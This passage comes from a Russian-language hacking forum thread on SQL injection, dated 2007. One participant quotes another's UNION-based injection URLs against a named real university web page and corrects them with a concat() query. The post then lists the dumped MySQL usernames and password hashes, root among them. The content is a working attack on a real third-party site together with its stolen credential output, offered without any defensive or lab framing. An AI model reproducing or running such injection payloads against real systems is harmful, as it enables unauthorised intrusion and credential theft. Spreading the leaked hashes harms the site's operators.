Форум АНТИЧАТ - SQL Инъекции

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

29.05.2007, 09:53

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Отправить сообщение для _Pantera_ с помощью ICQ

Цитата:

Сообщение от NOmeR1

Смотрим название картинки

Код:

http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+USER(),2/*
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+VERSION(),2/*
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+DATABASE(),2/*

Пароль от ROOT (хеш)

Код:

http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+user,2+from+mysql.user/*
http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+password,2+from+mysql.user/*

во первых пиши все одним запросом, почитай про concat(), во вторых твой запрос не верен, он должен быть вот таким

Код:

http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+1,2,concat(user,char(58),password),4,5,6,7,8,9,10+from+mysql.user/*

root:1fc1948a4f4019c6
root:
:
wordpress:4c939e2e4400bf8a
wiki:368560a9410169b5
phpbb2:77c86717526fcef9
phpesp:723444a11c4122af
iocrew:60bb08ca538d775c
liverank:0991050a06133626
356forum:1c3c515b47e848a9
forum:0f0dbe0300330c1b
wikiuser:1fc1948a4f4019c6